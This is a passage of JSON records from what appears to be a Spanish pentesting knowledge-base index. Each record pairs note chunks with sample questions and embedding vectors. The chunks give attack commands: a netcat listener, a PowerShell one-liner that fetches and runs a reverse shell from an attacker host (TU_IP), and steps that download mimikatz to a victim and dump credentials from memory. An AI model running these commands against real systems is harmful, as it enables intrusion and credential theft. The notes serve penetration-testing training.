β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que puedo levantar un servidor SMB para recibir archivos", "v": [-0.01362, -0.03973, -0.17946, -0.17419, -0.16659, -0.12189, -0.09608, -0.10976, 0.01022, -0.03488, -0.18022, -0.04489, 0.17851, -0.11825, -0.03582, 0.15971, 0.09504, -0.05151, 0.00957, 0.07431, 0.13357, 0.10913, 0.09065, -0.08743, 0.00776, 0.01116, 0.04006, 0.10405, -0.04733, -0.04169, -0.06968, -0.03922, 0.0185, 0.04431, 0.12382, -0.01222, -0.03295, 0.20287, -0.10499, 0.02317, 0.0616, 0.00968, -0.04722, 0.00447, -0.04504, -0.05246, 0.09769, -0.0637, 0.04909, 0.00075, -0.04148, -0.07966, -0.08966, -0.03238, -0.19009, 0.0728, 0.01029, -0.16741, 0.06313, 0.00396, -0.12816, 0.10489, -0.0086, -0.08271, 0.04869, 0.01085, -0.07976, 0.04576, -0.10983, -0.03941, -0.05062, 0.05686, 0.04945, -0.06982, 0.0156, 0.11138, 0.00261, -0.02781, -0.02585, 0.01735, 0.00551, -0.00821, -0.02826, 0.10826, -0.06786, -0.11735, -0.03302, 0.00952, 0.10632, 0.01559, 0.0716, 0.05219, -0.06462, 0.02397, 0.00284, -0.04217, 0.01778, -0.04586, -0.00963, -0.00414, 0.05814, 0.04264, 0.04155, 0.08742, 0.04686, 0.0869, 0.08009, -0.02474, 0.05437, -0.06284, 0.07017, 0.00328, -0.00663, 0.12236, -0.18335, -0.05252, -0.04711, -0.02976, 0.00664, 0.08014, -0.01957, -0.03098, 0.03229, 0.03745, 0.00102, -0.06473, 0.12563, 0.03571, -0.04664, 0.01473, 0.00629, 0.06503, 0.01737, 0.02336, -0.05231, -0.01491, 0.09692, -0.02913, -0.03608, -0.04992, 0.05628, 0.01675, -0.04528, 0.03442, 0.06866, -0.03235, 0.02156, -0.08907, -0.06303, -0.12386, 0.06148, -0.03264, -0.00247, -0.04998, -0.04436, 0.01815, 0.03046, -0.10313, -0.07421, 0.03726, -0.00566, 0.04641, -0.01479, 0.10103, -0.04814, -0.02371, 0.00932, 0.06166, -0.00152, 0.02165, -0.03563, -0.0158, 0.01388, -0.03449, 0.0076, -0.00829, -0.07, -0.01681, 0.02309, 0.01638, -0.02171, -0.02142, -0.01576, 0.01188, -0.06396, -0.05627, 0.03133, -0.00242, -0.02618, 0.02964, 0.01187, 0.01806, -0.04144, 0.03894, -0.03133, -0.05109, 0.00296, 0.02728, -0.03809, -0.0041, -0.04392, -0.04575, -0.09261, -0.0039, 0.0252, -0.04999, -0.00503, 0.06684, 0.06945, -0.03421, -0.02208, 0.01561, 0.07433, -0.06361, 0.00709, -0.01134, -0.00666, -0.00233, 0.03912, -0.03155, -0.02189, 0.00246, 0.01686, 0.03125, 0.00382, 0.00774, -0.04681, -0.00603, 0.01978, -0.00806, -0.04278, 0.04121, -0.02217, 0.04997, 0.02123, 0.00597, -0.01938, -0.03669, -0.00278, -0.00547, -0.01722, 0.04158, -0.00427, -0.0187, -0.01561, -0.05785, 0.03784, -0.05675, -0.03291, 0.01011, 0.06428, -0.0067, 0.0013, 0.01101, 0.01066, 0.03011]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual es una herramienta para servir contenido HTTP desde la terminal", "v": [-0.09941, -0.01937, -0.08518, -0.18306, 0.07119, -0.15873, -0.09393, -0.02438, 0.08054, 0.10523, -0.23601, 0.00039, 0.03782, -0.01562, 0.05614, 0.07872, 0.07423, -0.18517, 0.11565, -0.03371, -0.01675, 0.05592, -0.08503, 0.00542, -0.07926, -0.07562, 0.06916, 0.02364, -0.20598, -0.07624, 0.07204, -0.10061, 0.00443, 0.06641, -0.08594, -0.03948, -0.0474, 0.10857, -0.06035, 0.10595, 0.00811, 0.02841, -0.04472, 0.06264, -0.04316, 0.00568, 0.01547, -0.06224, 0.0795, -0.05574, 0.03238, -0.07579, -0.18067, 0.08415, -0.05463, 0.042, 0.16538, -0.20255, 0.05193, -0.10405, -0.07326, -0.02294, -0.00104, -0.0028, -0.01893, -0.06578, -0.06625, 0.04532, -0.1151, 0.1088, -0.02471, 0.05302, 0.05089, -0.00675, 0.04894, 0.03628, -0.05089, 0.04076, 0.03031, 0.05831, 0.07787, -0.02223, -0.05858, 0.03232, -0.0904, -0.11478, -0.02826, -0.01105, 0.06652, -0.03173, 0.09662, 0.09598, -0.05176, 0.03041, -0.0531, -0.09884, 0.01368, -0.06651, 0.0066, -0.0424, 0.10696, 0.04996, -0.07373, 0.06054, 0.07021, 0.03275, 0.00043, -0.03147, -0.0467, -0.07225, 0.07314, -0.00782, 0.03116, 0.03218, -0.03092, 0.00542, 0.00595, 0.00064, 0.01597, -0.11036, -0.02743, -0.01905, -0.10402, -0.00462, 0.04183, 0.02585, -0.02031, 0.06086, 0.06059, -0.04188, 0.03647, -0.0683, -0.03718, 0.03603, -0.05078, -0.03296, 0.09834, -0.19725, -0.01829, 0.00467, -0.01949, -0.00455, -0.05225, -0.02911, 0.08376, 0.02633, 0.00679, -0.00722, -0.06757, -0.03091, 0.0093, -0.04372, -0.06332, -0.02975, -0.07599, 0.01287, -0.02875, -0.01588, -0.12776, 0.0765, -0.00366, -0.09271, 0.03768, 0.03968, 0.01876, 0.00958, -0.09496, 0.03318, 0.08769, -0.03212, 0.04088, 0.01917, 0.02082, -0.05032, -0.02782, -0.07276, -0.10853, -0.00168, -0.00049, -0.05768, -0.02135, -0.04338, -0.01064, 0.00859, 0.01202, -0.08168, 0.04675, -0.03072, -0.00319, 0.03894, 0.00059, 0.02312, -0.06931, 0.01608, 0.06544, 0.01635, -0.03616, -0.05599, 0.0406, 0.01116, -0.04319, -0.01467, 0.05515, -0.0509, 0.01095, 0.03496, -0.03051, -0.04064, -0.03692, -0.00764, 0.01915, 0.00334, 0.03322, -0.003, 0.01099, -0.00731, -0.00702, 0.02209, -0.0439, 0.04172, 0.00173, -0.03555, 0.01147, -0.00393, 0.00945, 0.02416, 0.05186, 0.0126, 0.0178, -0.05483, -0.0082, -0.01694, -0.03456, -0.00148, 0.0485, -0.02955, 0.01357, -0.02268, -0.04967, -0.06706, -0.00659, 0.0456, 0.00216, -0.01989, 0.01318, -0.02609, -0.04584, -0.0267, -0.03789, -0.03111, -0.05711, -0.02271, 0.05826, -0.03085, -0.01943, -0.00742]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "que herramienta sirve para ejecutar comandos remotos en Windows?", "v": [0.16923, 0.05176, -0.1218, -0.18214, 0.10715, -0.06139, 0.02711, -0.02866, 0.00627, -0.08532, -0.10839, -0.08594, 0.09694, -0.07892, 0.0788, 0.07417, 0.09299, -0.00054, -0.07619, -0.01378, 0.05221, -0.08393, -0.00042, 0.04094, -0.06415, 0.02047, 0.1089, 0.01525, -0.16632, -0.02746, 0.03374, 0.01892, 0.0323, -0.0826, -0.06508, 0.00153, -0.1002, 0.07603, -0.03498, 0.11995, 0.02358, 0.1085, -0.15492, 0.00496, 0.0394, -0.04106, 0.07515, -0.03063, 0.0986, -0.00671, -0.01046, -0.12008, -0.07746, -0.04895, -0.02299, -0.09886, 0.27558, -0.09892, -0.02005, -0.02883, -0.05425, -0.04735, 0.01008, 0.05193, 0.0179, -0.06266, -0.03899, -0.1348, -0.05862, 0.09479, -0.14978, 0.04272, 0.04855, 0.04535, 0.00338, -0.03352, -0.07098, -0.0049, 0.13915, -0.05037, 0.00861, 0.00829, -0.09794, -0.05475, -0.09551, -0.18983, -0.00723, -0.00682, 0.00875, -0.12837, 0.05771, -0.01552, -0.02952, 0.0409, 0.08448, 0.03203, 0.03707, -0.03428, 0.02845, 0.03432, 0.03964, -0.06968, -0.05954, 0.09795, -0.01903, 0.05355, 0.02076, -0.07313, -0.02815, -0.0115, 0.05114, -0.00207, 0.0128, -0.04928, -0.04619, -0.02816, -0.03541, -0.08706, 0.03182, -0.00723, -0.09536, 0.04194, -0.04149, 0.02502, -0.00413, -0.04898, -0.08865, 0.08833, -0.00719, -0.00434, -0.00187, -0.04191, 0.00789, -0.04369, -0.07305, 0.07939, 0.01442, -0.09659, -0.01693, -0.17458, 0.08487, 0.07281, 0.01773, -0.02758, 0.06553, 0.02355, 0.08203, 0.00878, -0.01077, 0.00902, 0.08885, -0.03596, -0.07543, 0.04294, -0.07399, -0.02852, -0.07211, 0.03406, -0.05704, 0.06129, -0.02295, -0.02961, -0.00854, -0.03028, 0.03476, -0.05112, 0.01013, -0.00329, 0.06955, 0.05602, -0.05269, 0.07093, 0.00846, -0.04299, -0.01965, -0.04757, -0.00463, 0.02232, 0.00096, -0.03063, -0.08814, 0.04481, -0.02674, -0.06302, 0.04796, 0.01255, -0.0163, 0.00708, -0.03043, 0.01524, -0.05143, 0.02314, 0.0046, -0.07229, 0.01659, -0.00918, -0.03805, -0.02998, -0.00137, -0.01514, -0.0745, -0.01169, 0.02733, -0.06396, 0.09645, 0.05101, -0.02602, 0.06643, 0.01804, 0.07378, 0.0101, -0.02904, 0.04085, -0.01356, -0.03112, -0.09441, 0.03401, -0.02352, -0.00881, -0.00599, 0.00088, -0.0072, 0.0645, -0.03389, 0.02322, 0.03714, -0.00398, -0.01319, 0.0299, -0.03883, 0.02031, 0.00656, 0.00203, -0.02933, 0.0298, -0.04495, 0.00838, -0.05343, -0.02852, -0.01246, -0.07071, 0.05798, -0.00943, -0.0941, -0.0548, -0.08119, -0.07386, -0.00467, -0.02931, -0.06043, -0.02888, 0.00533, 0.06229, -0.02173, -0.03382, -0.00375]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "con que puedo montar un reverse shell interactivo desde PowerShell?", "v": [0.07062, -0.03591, -0.1184, -0.03501, -0.18263, 0.02352, -0.09051, -0.02256, -0.04601, -0.06966, -0.1178, 0.05574, 0.05734, -0.08659, 0.07848, 0.15669, -0.1093, -0.07717, -0.03494, 0.01261, -0.05241, -0.05281, -0.13961, -0.18384, 0.00732, 0.16197, -0.0798, 0.13294, -0.10196, -0.10468, -0.06575, -0.06941, 0.05455, -0.03229, -0.08096, 0.00669, -0.04078, 0.05598, 0.15996, 0.06444, -0.08042, 0.02229, -0.04743, 0.09512, 0.06918, 0.00671, 0.01431, -0.16121, -0.02009, 0.02945, -0.06501, -0.05822, -0.19833, 0.0265, 0.04517, -0.07783, 0.11895, -0.10533, 0.02712, -0.10064, -0.06412, 0.17818, -0.0665, 0.10294, 0.01493, -0.00504, -0.11804, -0.1151, -0.11484, 0.03059, -0.0817, -0.03487, -0.00758, 0.01138, -0.07292, 0.03482, 0.10726, 0.00252, -0.02285, 0.02529, -0.11445, -0.0275, -0.00914, 0.07121, -0.018, 0.03098, -0.03498, -0.16795, -0.01211, 0.05924, 0.05275, 0.07609, 0.01985, 0.04342, -0.04979, -0.09703, -0.0533, 0.12304, -0.07564, -0.02716, -0.07002, 0.02842, -0.00762, 0.07174, 0.1273, 0.008, -0.03596, 0.02732, 0.03262, 0.07905, -0.00042, -0.01563, 0.0369, 0.03925, -0.00852, -0.02695, -0.07989, -0.06164, 0.01466, -0.01447, -0.0023, 0.05379, 0.01624, 0.04693, 0.02561, 0.03337, 0.07898, 0.04943, -0.00311, 0.0192, 0.01671, -0.03119, 0.05661, -0.0369, -0.02102, 0.04745, 0.0136, 0.03443, -0.04767, -0.02535, 0.03765, 0.08023, -0.00659, -0.06888, -0.00657, -0.05641, 0.02176, -0.03957, -0.01781, 0.07104, 0.03249, 0.13047, 0.05027, 0.04333, -0.01614, -0.05246, 0.06051, -0.00435, -0.00596, -0.01492, -0.08406, 0.05524, 0.02162, 0.05907, -0.00786, -0.04364, -0.16667, -0.0332, 0.02675, -0.01564, -0.05009, 0.07867, 0.08009, 0.04454, 0.06563, 0.0627, -0.02538, 0.02216, -0.0198, -0.02737, 0.01311, -0.04406, -0.01934, -0.03311, -0.057, 0.04393, 0.0256, 0.0035, 0.00842, 0.01615, -0.00432, 0.02991, 0.01405, -0.04412, 0.0828, -0.00192, 0.06647, -0.02231, 0.02161, -0.00572, -0.00803, 0.0461, -0.01131, 0.00285, -0.01102, -0.00205, -0.03512, 0.05325, 0.00547, -0.04378, 0.04054, 0.03506, 0.0864, 0.07713, 0.02564, -0.01052, 0.00416, -0.02714, -0.05625, 0.12278, -0.00531, -0.00175, 0.01936, 0.03159, 0.02606, -0.04308, 0.02535, -0.01059, -0.01819, 0.01268, -0.00415, 0.03484, 0.00931, 0.00927, -0.03381, -0.0144, 0.00013, 0.00494, -0.01598, 0.03642, -0.02269, 0.05011, 0.04685, -0.02932, -0.02699, -0.02223, -0.03219, -0.00823, -0.02083, -0.02519, -0.01721, 0.0063, -0.00803, -0.03988, -0.03574, -0.07398]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "cual es una alternativa libre a los scripts de ConPtyShell?", "v": [-0.04378, -0.00518, -0.04086, -0.01359, -0.06997, -0.18417, -0.09525, -0.15182, -0.02768, 0.034, -0.14646, -0.06789, -0.03518, -0.06949, 0.06887, -0.01065, -0.02088, -0.11476, 0.12724, 0.01209, -0.0694, 0.01553, -0.09182, -0.06372, -0.06575, -0.09933, 0.02745, 0.13901, -0.16855, -0.05139, -0.04047, -0.039, -0.01519, -0.03961, -0.05614, 0.08495, 0.0625, 0.13896, 0.16162, 0.09689, 0.00622, -0.08828, -0.04684, 0.11498, -0.02364, -0.13833, -0.00927, 0.00831, -0.00929, 0.00123, -0.0155, -0.02997, -0.13514, 0.03837, 0.03604, 0.02152, 0.03876, -0.16619, -0.06818, 0.02093, -0.05691, -0.01309, 0.02074, -0.01747, 0.03263, 0.01042, -0.03723, -0.14317, -0.0811, 0.087, 0.03366, -0.04695, -0.04118, -0.02331, 0.01861, 0.06691, -0.1558, -0.09827, -0.03225, 0.01194, -0.03179, -0.15387, 0.00522, 0.03473, -0.01005, -0.13603, -0.06665, -0.12252, -0.053, 0.03183, 0.15504, 0.04704, 0.00849, 0.11279, -0.00398, -0.12875, 0.02804, 0.07744, 0.0367, 0.08045, -0.04443, -0.01544, -0.10032, 0.05457, 0.03967, 0.06671, 0.01274, 0.06523, -0.01656, 0.02438, 0.05165, 0.09637, -0.0061, 0.04951, 0.01242, -0.06543, -0.03779, 0.01049, 0.02863, -0.07081, -0.01857, -0.00138, -0.08473, -0.07356, 0.01892, 0.04129, 0.0441, -0.00892, -0.06005, 0.04191, -0.0188, -0.04388, -0.11485, -0.09008, -0.10536, 0.03145, 0.14066, 0.00117, -0.0211, -0.05594, 0.02048, 0.04947, 0.08031, 0.04653, 0.0378, -0.08176, -0.05508, -0.07698, 0.01983, -0.0168, -0.03392, 0.02405, 0.00852, 0.11677, -0.01354, -0.05809, -0.00207, 0.00765, -0.07562, 0.03155, 0.03164, -0.05719, -0.02431, 0.02039, 0.01081, -0.05562, -0.03115, 0.00671, -0.06405, 0.03465, 0.03981, 0.08575, 0.10135, -0.06233, 0.02174, -0.08554, 0.01736, -0.09514, -0.04001, -0.05066, 0.02707, 0.00224, -0.05221, -0.00349, -0.02415, -0.05149, -0.01046, 0.01514, 0.03661, 0.02486, -0.02628, 0.02112, -0.07996, -0.13584, -0.03039, 0.00407, 0.01172, -0.09025, -0.05019, -0.02988, -0.08282, 0.04409, -0.02327, -0.03526, 0.03104, 0.01282, -0.0167, 0.01292, -0.02082, -0.00176, 0.07319, 0.0235, 0.07269, 0.06424, -0.04501, -0.02786, 0.04314, 0.039, -0.03051, -0.02578, 0.06637, -0.02888, -0.03627, -0.05116, -0.00039, 0.01319, 0.05187, 0.04787, -0.05108, 0.02126, 0.01467, -0.01092, -0.04159, 0.02094, 0.00262, -0.02363, -0.01656, 0.02197, -0.02084, -0.02589, 0.01368, 0.05026, -0.01853, -0.0543, -0.04532, 0.00334, -0.09567, -0.04737, -0.00833, -0.01051, -0.00743, 0.00132, 0.0018, -0.01268, 0.0234, 0.00851]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "que herramienta puedo usar para extraer contraseΓ±as y tickets de la memoria", "v": [0.10908, 0.06859, -0.2042, -0.21779, -0.01646, -0.04012, -0.08258, -0.02906, -0.07162, -0.07823, -0.11345, 0.03982, 0.00666, -0.02402, 0.00791, 0.00158, 0.17101, -0.01287, 0.05379, 0.01244, -0.02657, -0.03134, -0.10433, 0.03353, -0.08901, 0.03763, 0.06603, 0.03549, -0.15715, 0.04422, -0.02046, 0.04475, 0.09549, -0.07314, -0.01749, 0.04665, 0.02093, 0.10988, 0.00666, 0.02779, 0.06428, 0.09211, -0.11227, 0.10277, 0.01322, -0.02328, -0.02928, 0.07636, 0.03672, -0.00714, -0.04693, -0.14919, -0.09051, -0.01112, 0.02542, -0.16872, 0.14201, -0.0672, -0.0088, -0.0258, -0.09484, 0.02077, -0.00839, 0.08092, -0.04572, -0.02072, 0.06307, -0.02023, -0.13815, 0.11374, -0.1333, 0.03318, 0.06351, 0.0657, 0.04004, 0.03967, 0.0967, 0.00234, 0.05179, 0.09618, -0.09273, -0.06339, -0.00239, -0.04927, -0.06705, 0.0092, 0.11305, -0.03537, 0.0478, -0.03973, 0.02142, 0.05827, 0.00878, 0.05794, 0.06638, -0.08911, 0.00905, 0.06251, -0.01477, -0.01273, 0.07245, -0.03754, 0.00967, 0.16245, 0.00013, -0.02216, 0.00348, 0.00085, -0.03374, -0.06015, 0.029, -0.00149, -0.09248, -0.02094, -0.0723, 0.06392, 0.05356, -0.0195, 0.03321, -0.01322, 0.05635, -0.07215, -0.00021, -0.08568, 0.04607, 0.01723, -0.0545, 0.08759, -0.06891, -0.13864, -0.00244, 0.05696, -0.06755, -0.03195, -0.01583, 0.04599, -0.00175, -0.08357, -0.0195, -0.00708, 0.01749, -0.01194, -0.0609, -0.05341, 0.01342, 0.08838, 0.01008, 0.05555, -0.05231, -0.03433, 0.05757, -0.05988, 0.05653, 0.06773, -0.01546, 0.05752, -0.00797, -0.06361, -0.13768, 0.07998, -0.13383, -0.07127, 0.01146, 0.03625, -0.01939, -0.07934, -0.0569, 0.02576, 0.06687, 0.0806, 0.05816, -0.0084, 0.0777, -0.02798, 0.01717, -0.07057, -0.06535, -0.04814, 0.03768, -0.08884, -0.01297, -0.05347, -0.06904, -0.02514, -0.01221, -0.09761, 0.11041, -0.03926, 0.00197, 0.0136, 0.00063, 0.02305, 0.07005, 0.02026, -0.00924, -0.0432, -0.0344, -0.0366, 0.02584, -0.02931, -0.04152, 0.06709, -0.04027, -0.0473, 0.06978, 0.05895, -0.07417, -0.01964, -0.02632, -0.00189, 0.05554, -0.02916, 0.01073, -0.05686, -0.09188, -0.03598, -0.02329, 0.00469, -0.05406, -0.05499, 0.05113, 0.04877, 0.08217, 0.03321, -0.0271, -0.02435, 0.00917, 0.02486, 0.01617, -0.0272, 0.00437, 0.06052, -0.02265, -0.01929, 0.07441, -0.02595, -0.02446, -0.06495, -0.05854, 0.00802, -0.02876, 0.04821, -0.01127, -0.01365, -0.10365, -0.02935, -0.03318, 0.02838, 0.03322, -0.07579, -0.01306, 0.01628, 0.0641, -0.00241, 0.00961, -0.03555]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "cual es el comando para obtener hashes NTLM dentro del sistema Windows", "v": [-0.10666, -0.03653, 0.02027, -0.12343, 0.01817, -0.10609, -0.11644, 0.04595, -0.08983, 0.09072, -0.15657, -0.05498, 0.01394, -0.04494, -0.03705, 0.12022, 0.03076, -0.1175, -0.0264, -0.01308, -0.08971, -0.04465, -0.07871, -0.02489, -0.02529, 0.00934, 0.00416, -0.02986, -0.20608, -0.00379, -0.02739, -0.04465, -0.0446, -0.00633, -0.02946, 0.07164, -0.03536, 0.09601, 0.0135, 0.21086, 0.01644, 0.17775, -0.09284, 0.10821, 0.11573, -0.15969, 0.05446, -0.07389, 0.16897, -0.18389, -0.03517, 0.06995, -0.11615, -0.10107, 0.04208, -0.12254, 0.11141, -0.02023, -0.04029, -0.00106, -0.05753, -0.01945, 0.00019, -0.02084, -0.07898, -0.05139, 0.02742, -0.09477, -0.01412, 0.08181, -0.10773, 0.05962, 0.05678, -0.0323, 0.02039, 0.04022, -0.06031, -0.0243, 0.14442, -0.00019, 0.06969, 0.03978, -0.07704, 0.00839, -0.04208, -0.13439, -0.0416, -0.05684, 0.00032, -0.02273, 0.05249, -0.10069, -0.02093, 0.08585, 0.12384, -0.06315, -0.01535, 0.01178, 0.01005, 0.05696, -0.02096, -0.12003, -0.1246, 0.17867, -0.07853, 0.03174, 0.06735, -0.04653, -0.00844, 0.01934, 0.04573, -0.03201, -0.01957, 0.03095, -0.03775, -0.03938, 0.01195, -0.04999, -0.0239, -0.02058, -0.14691, 0.06941, -0.02921, 0.05875, 0.07773, -0.0552, -0.0233, 0.0755, -0.01445, 0.00964, 0.06918, -0.02298, -0.01063, -0.04453, -0.03295, 0.05623, -0.00896, 0.03152, -0.0165, -0.10109, 0.07017, 0.09843, 0.04591, -0.01399, 0.05745, 0.00026, 0.09384, -0.02813, 0.00236, -0.05433, 0.03845, 0.03894, -0.06663, -0.04205, -0.02453, -0.00755, -0.00809, 0.02882, -0.04253, -0.01373, 0.00335, -0.01882, -0.02605, 0.05267, 0.00294, -0.01532, -0.02162, -0.01564, 0.02912, -0.04328, -0.02099, 0.00656, -0.01232, -0.02304, 0.02767, -0.05388, 0.05034, -0.05687, -0.021, -0.00961, -0.02848, 0.10003, 0.02524, -0.04238, -0.02498, 0.02052, -0.04071, 0.07782, -0.05635, -0.01062, -0.01115, 0.04097, -0.02602, -0.0507, 0.00033, -0.01099, -0.01348, -0.0582, 0.0328, -0.0063, -0.07086, 0.07767, 0.02493, -0.10173, 0.06612, -0.00165, 0.00178, 0.04396, 0.05209, 0.04353, 0.0361, 0.01865, 0.04677, -0.02365, -0.08787, -0.02238, -0.00646, -0.0, -0.00052, -0.0351, -0.00767, 0.02042, 0.05879, 0.01214, -0.0243, -0.05987, -0.09467, 0.05614, 0.02062, -0.01185, -0.02504, -0.04828, 0.0105, 0.01889, 0.01575, -0.00031, -0.00964, 0.00681, -0.00217, -0.0532, 0.01997, 0.08181, -0.03074, -0.07486, -0.03887, -0.05389, -0.06684, -0.00261, -0.01355, -0.04489, -0.0047, 0.00482, -0.00476, -0.02217, -0.0559, -0.00401]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Dentro de la shell, en la vΓ­ctima:\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe\nC:\\Windows\\Temp\\m.exe\n```\n\nY dentro de mimikatz:\n\n```\nprivilege::debug\nsekurlsa::logonpasswords\n```\n\nTe aparecen hashes NTLM, Kerberos tickets en memoria, a veces hasta contraseΓ±as en claro (wdigest).", "indexar": "como accedo a credenciales en memoria desde una consola de Linux", "v": [-0.12267, -0.02388, -0.14431, -0.07167, -0.03739, -0.14807, -0.12939, 0.08023, -0.14543, -0.04599, -0.05715, 0.04942, -0.02692, -0.08572, 0.0959, -0.10022, 0.04685, -0.05542, -0.01824, -0.02409, -0.08545, -0.00853, -0.09001, 0.0422, 0.17724, 0.03149, 0.11558, 0.00475, 0.14545, 0.04245, -0.08839, -0.01787, 0.09815, 0.02441, 0.02151, 0.07205, -0.06926, 0.03071, 0.06286, 0.09724, 0.07992, 0.00629, 0.00165, 0.00791, -0.00081, -0.23158, 0.06287, 0.02379, 0.06638, -0.11882, 0.04584, -0.05305, -0.01426, -0.02198, 0.14783, 0.0422, 0.06434, -0.06537, 0.14985, -0.00583, -0.14641, 0.04981, 0.09518, 0.05756, 0.05905, 0.08364, -0.08996, -0.07206, -0.11944, 0.06957, -0.16004, 0.04907, -0.02069, -0.02547, 0.00568, -0.01901, -0.0939, 0.06573, 0.08017, 0.00818, 0.0116, -0.11998, -0.0147, -0.02362, -0.00568, -0.0341, 0.04416, 0.04457, -0.04455, 0.09004, 0.03494, 0.05486, -0.01172, 0.18924, 0.1392, 0.01146, 0.05749, 0.10947, 0.07328, -0.00129, -0.03375, 0.04, -0.0912, 0.15084, 0.01328, 0.0095, 0.01517, -0.00498, 0.00466, -0.07938, 0.03577, 0.03695, -0.01085, 0.05473, -0.08131, 0.0167, 0.00564, 0.01405, 0.07244, 0.00592, 0.02509, -0.06441, 0.05472, -0.05514, -0.05787, 0.03437, -0.14957, 0.07237, -0.04791, -0.04338, -0.00377, -0.06975, 0.03126, -0.01859, 